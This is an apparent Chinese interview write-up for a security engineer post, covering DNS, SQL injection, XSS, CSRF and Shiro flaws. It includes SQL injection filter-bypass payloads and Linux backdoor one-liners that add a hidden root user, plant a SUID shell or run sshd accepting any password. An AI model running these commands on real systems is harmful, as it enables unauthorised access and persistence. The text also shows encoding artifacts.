所面試的公司：某安全廠商

所在城市：浙江寧波

面試職位：駐場(chǎng)安全服務(wù)工程師

面試官的問(wèn)題：

1、信息收集如何處理子域名爆破的泛解析問(wèn)題？

泛域名解析是：*.域名解析到同一IP。
域名解析是：子域名.域名解析到同一IP。

解決方式：IP黑名單，首先訪問(wèn)一個(gè)隨機(jī)的并不存在的域，通過(guò)返回的結(jié)果判斷是否存在泛解析，確定存在泛解析后，不斷的生成隨機(jī)域名并發(fā)送請(qǐng)求，將每次返回的IP和TTL記錄下來(lái)，直到大部分的IP出現(xiàn)次數(shù)都大于兩次，則IP黑名單收集完成。
而后使用域名字典進(jìn)行爆破，爆破過(guò)程中根據(jù)IP黑名單進(jìn)行過(guò)濾，同時(shí)比較TTL，在泛解析記錄中TTL是相同的，如果TTL不相同，則不是泛解析記錄。

2、訪問(wèn)百度，都涉及到哪些協(xié)議？

HTTP：當(dāng)你在瀏覽器中輸入百度的網(wǎng)址時(shí)，瀏覽器會(huì)發(fā)送HTTP請(qǐng)求到百度的服務(wù)器，請(qǐng)求獲取網(wǎng)頁(yè)內(nèi)容。HTTP協(xié)議定義了客戶端和服務(wù)器之間的通信規(guī)則和格式。
DNS：在發(fā)送HTTP請(qǐng)求之前，瀏覽器需要將百度的域名（URL）轉(zhuǎn)換為服務(wù)器的IP地址。這個(gè)轉(zhuǎn)換過(guò)程通過(guò)DNS協(xié)議實(shí)現(xiàn)。瀏覽器會(huì)向DNS服務(wù)器發(fā)送請(qǐng)求，以查詢與百度域名對(duì)應(yīng)的IP地址。
TCP/IP：TCP/IP協(xié)議是互聯(lián)網(wǎng)通信的基礎(chǔ)協(xié)議。在打開(kāi)百度網(wǎng)站時(shí)，HTTP請(qǐng)求會(huì)被封裝在TCP/IP協(xié)議中進(jìn)行傳輸。TCP協(xié)議提供可靠的連接，確保數(shù)據(jù)的完整性和順序。IP協(xié)議則負(fù)責(zé)將數(shù)據(jù)包傳輸?shù)侥繕?biāo)服務(wù)器的IP地址。
SSL/TLS：當(dāng)使用HTTPS訪問(wèn)百度網(wǎng)站時(shí)，通信采用SSL/TLS協(xié)議進(jìn)行加密，確保數(shù)據(jù)傳輸?shù)陌踩浴SL/TLS協(xié)議使用公鑰加密和私鑰解密的技術(shù)，防止數(shù)據(jù)在傳輸過(guò)程中被竊聽(tīng)或篡改。

3、sqlmap —os-shell的原理？

使用此條命令必須獲取到目標(biāo)站點(diǎn)的絕對(duì)路徑，且當(dāng)前數(shù)據(jù)庫(kù)權(quán)限必須是dba，sa。工作原理是使用 into outfile()函數(shù)去寫(xiě)一個(gè)可以進(jìn)行文件上傳的 php文件，再根據(jù)這個(gè)文件寫(xiě)了一個(gè)木馬，通過(guò)木馬進(jìn)行命令執(zhí)行。
其條件必須具備以下幾點(diǎn)：
1，已知目標(biāo)站點(diǎn)的絕對(duì)路徑
2，已知目標(biāo)站點(diǎn)的腳本語(yǔ)言
3，當(dāng)前數(shù)據(jù)庫(kù)權(quán)限必須是dba，sa權(quán)限

4、過(guò)濾逗號(hào)的SQL注入如何繞過(guò)？

在使用盲注的時(shí)候，需要使用到substr(),mid(),limit。這些都需要使用到逗號(hào)。對(duì)于substr()和mid()這兩個(gè)方法可以使用from to的方式來(lái)解決:

select substr(database() from 1 for 1);select mid(database() from 1 for 1);

使用join：

union select 1,2 #等價(jià)于union select from (select 1)a join (select 2)b

使用like：

select ascii(mid(user(),1,1))=80 #等價(jià)于select user() like ‘r%’

其他繞過(guò)方式：

select from table1 where id =1 and exists (select from table2 where ord(substring(username from 1 for 1)=97);
127’ UNION SELECT FROM ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d JOIN (SELECT 5)e)#
select case when substring((select password from mysql.user where user=’root’) from 1 for 1)=’e’ then sleep(5) else 0 end #
substring((select password from mysql.user where user=’root’) from -1）=’e’

5、防止XSS攻擊，從前端后端兩個(gè)角度？

前端：用戶輸入特殊字符過(guò)濾轉(zhuǎn)義為html實(shí)體用戶輸出編碼
后端：實(shí)體化編碼函數(shù)過(guò)濾限制字符長(zhǎng)度

6、samesite了解過(guò)嗎，怎么去防御CSRF
Chrome 51 開(kāi)始，瀏覽器的 Cookie 新增加了一個(gè)SameSite屬性，用來(lái)防止 CSRF 攻擊 和用戶追蹤（第三方惡意獲取cookie），限制第三方 Cookie，從而減少安全風(fēng)險(xiǎn)。

SameSite屬性可以設(shè)置三個(gè)值：Strict、Lax、None。

Strict：嚴(yán)格，完全禁止第三方獲取cookie，跨站點(diǎn)時(shí)，任何情況下都不會(huì)發(fā)送cookie；只有當(dāng)前網(wǎng)頁(yè)的 URL 與請(qǐng)求目標(biāo)一致，才會(huì)帶上 Cookie。這個(gè)規(guī)則過(guò)于嚴(yán)格，可能造成非常不好的用戶體驗(yàn)。比如，當(dāng)前網(wǎng)頁(yè)有一個(gè) GitHub 鏈接，用戶點(diǎn)擊跳轉(zhuǎn)就不會(huì)帶有 GitHub 的 Cookie，跳轉(zhuǎn)過(guò)去總是未登陸狀態(tài)。
Set-Cookie: CookieName=CookieValue; SameSite=Strict;

Lax：防范跨站，大多數(shù)情況下禁止獲取cookie，除非導(dǎo)航到目標(biāo)網(wǎng)址的GET請(qǐng)求（鏈接、預(yù)加載、GET表單）；設(shè)置了Strict或Lax以后，基本就杜絕了 CSRF 攻擊。當(dāng)然，前提是用戶瀏覽器支持 SameSite 屬性。
SameSite屬性的默認(rèn)SameSite=Lax 【該操作適用于2019年2月4號(hào)谷歌發(fā)布Chrome 80穩(wěn)定版之后的版本】
Set-Cookie: CookieName=CookieValue; SameSite=Lax;

None：沒(méi)有限制。

7、Linux常見(jiàn)后門(mén)

這個(gè)真的挺多的...

一句話添加用戶和密碼
添加普通用戶：
創(chuàng)建一個(gè)用戶名guest，密碼123456的普通用戶

useradd -p openssl passwd -1 -salt 'salt' 123456 guestuseradd -p 方法   是用來(lái)存放可執(zhí)行的系統(tǒng)命令,”$()”也可以存放命令執(zhí)行語(yǔ)句useradd -p “$(openssl passwd -1 123456)” guest

添加root用戶：
創(chuàng)建一個(gè)用戶名guest，密碼123456的root用戶

useradd -p openssl passwd -1 -salt 'salt' 123456 guest -o -u 0 -g root -G root -s /bin/bash -d /home/test

SUID Shell
Suid shell是一種可用于以擁有者權(quán)限運(yùn)行的shell。
配合普通用戶權(quán)限使用

cp /bin/bash /tmp/shellchmod u+s /tmp/shell

使用guest用戶登錄就可疑獲取root權(quán)限。

備注：bash2針對(duì)suid做了一些防護(hù)措施，需要使用-p參數(shù)來(lái)獲取一個(gè)root shell。另外，普通用戶執(zhí)行這個(gè)SUID shell時(shí)，一定要使用全路徑。

ssh公私鑰免密登錄
在客戶端上生成一對(duì)公私鑰，然后把公鑰放到服務(wù)器上（~/.ssh/authorized_keys），保留私鑰。當(dāng)ssh登錄時(shí)，ssh程序會(huì)發(fā)送私鑰去和服務(wù)器上的公鑰做匹配。如果匹配成功就可以登錄了。
客戶端：

ssh-keygen -t rsa

進(jìn)入/root/.ssh/文件夾，查看文件夾的內(nèi)容：
其中 id_rsa為私鑰，id_rsa.pub為公鑰，接下來(lái)打開(kāi)id_rsa.pub，將內(nèi)容復(fù)制到服務(wù)器。將id_rsa.pub的內(nèi)容追加到/root/.ssh/authorized_keys內(nèi)，配置完成。

軟連接
在sshd服務(wù)配置運(yùn)行PAM認(rèn)證的前提下，PAM配置文件中控制標(biāo)志為sufficient時(shí)只要pam_rootok模塊檢測(cè)uid為0即root權(quán)限即可成功認(rèn)證登陸。通過(guò)軟連接的方式，實(shí)質(zhì)上PAM認(rèn)證是通過(guò)軟連接的文件名 /tmp/su 在/etc/pam.d/目錄下尋找對(duì)應(yīng)的PAM配置文件(如: /etc/pam.d/su)，任意密碼登陸的核心是auth sufficient pam_rootok.so，所以只要PAM配置文件中包含此配置即可SSH任意密碼登陸，除了su中之外還有chsh、chfn同樣可以。
在目標(biāo)服務(wù)器上執(zhí)行一句話后門(mén)：

ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=8888

執(zhí)行完之后，任何一臺(tái)機(jī)器ssh root@IP -p 8888，輸入任意密碼，成功登錄。

SSH wrapper
首先啟動(dòng)的是/usr/sbin/sshd,腳本執(zhí)行到getpeername這里的時(shí)候，正則匹配會(huì)失敗，于是執(zhí)行下一句，啟動(dòng)/usr/bin/sshd，這是原始sshd。原始的sshd監(jiān)聽(tīng)端口建立了tcp連接后，會(huì)fork一個(gè)子進(jìn)程處理具體工作。這個(gè)子進(jìn)程，沒(méi)有什么檢驗(yàn)，而是直接執(zhí)行系統(tǒng)默認(rèn)的位置的/usr/sbin/sshd，這樣子控制權(quán)又回到腳本了。此時(shí)子進(jìn)程標(biāo)準(zhǔn)輸入輸出已被重定向到套接字，getpeername能真的獲取到客戶端的TCP源端口，如果是19526就執(zhí)行sh給個(gè)shell
簡(jiǎn)單點(diǎn)就是從sshd fork出一個(gè)子進(jìn)程，輸入輸出重定向到套接字，并對(duì)連過(guò)來(lái)的客戶端端口進(jìn)行了判斷。

strace后門(mén)
通過(guò)命令替換動(dòng)態(tài)跟蹤系統(tǒng)調(diào)用和數(shù)據(jù)，可以用來(lái)記錄用戶ssh、su、sudo的操作。

crontab反彈shell
crontab命令用于設(shè)置周期性被執(zhí)行的指令。新建shell腳本，利用腳本進(jìn)行反彈。

openssh后門(mén)
利用openssh后門(mén)，設(shè)置SSH后門(mén)密碼及root密碼記錄位置，隱蔽性較強(qiáng)，不易被發(fā)現(xiàn)。

rookit后門(mén)
Mafix是一款常用的輕量應(yīng)用級(jí)別Rootkits，是通過(guò)偽造ssh協(xié)議漏洞實(shí)現(xiàn)遠(yuǎn)程登陸的特點(diǎn)是配置簡(jiǎn)單并可以自定義驗(yàn)證密碼和端口號(hào)。
利用方法：安裝完成后，使用ssh 用戶@IP -P 配置的端口，即可遠(yuǎn)程登錄。

8、shiro相關(guān)漏洞

shiro550
Apache Shiro框架提供了記住密碼的功能(RememberMe)，用戶登錄成功后會(huì)生成經(jīng)過(guò)加密并編碼的Cookie，在服務(wù)端對(duì)rememberMe的Cookie值先base64解碼然后AES解密再反序列化（AES是硬編碼的），就導(dǎo)致了反序列化RCE漏洞。

shiro721
Apache Shiro RememberMe Cookie默認(rèn)通過(guò)AES-128-CBC模式加密，這種加密方式容易受到Padding Oracle Attack（Oracle填充攻擊），利用有效的RememberMe Cookie作為Padding Oracle Attack的前綴，然后精心構(gòu)造 RememberMe Cookie 值來(lái)實(shí)現(xiàn)反序列化漏洞攻擊。

先使用合法賬號(hào)進(jìn)行登錄勾選remember Me然后使用bp抓包，
然后獲取到cookie，將remember me字段復(fù)制下利用工具生成惡意的rememberme。

550和721區(qū)別
550不需要登錄，721需要登錄獲取正確的cookie，550是因?yàn)閍es密鑰是硬編碼，所以直接可以構(gòu)造payload，而721是利用Oracle填充攻擊，將正確的cookie作為攻擊前綴從而生成攻擊payload。
利用漏洞時(shí)550只需要一個(gè)url就可以利用工具實(shí)現(xiàn)檢測(cè)和攻擊，721需輸入url，提供一個(gè)有效的rememberMe Cookie。

面試結(jié)果：一面通過(guò)，等待二面中。

面試難度：適中。

給大家的建議：一定要多多拓展知識(shí)的寬度。

?申明：本賬號(hào)所分享內(nèi)容僅用于網(wǎng)絡(luò)安全技術(shù)討論，切勿用于違法途徑，所有滲透都需獲取授權(quán)，違者后果自行承擔(dān)，與本號(hào)及作者無(wú)關(guān)，請(qǐng)謹(jǐn)記守法。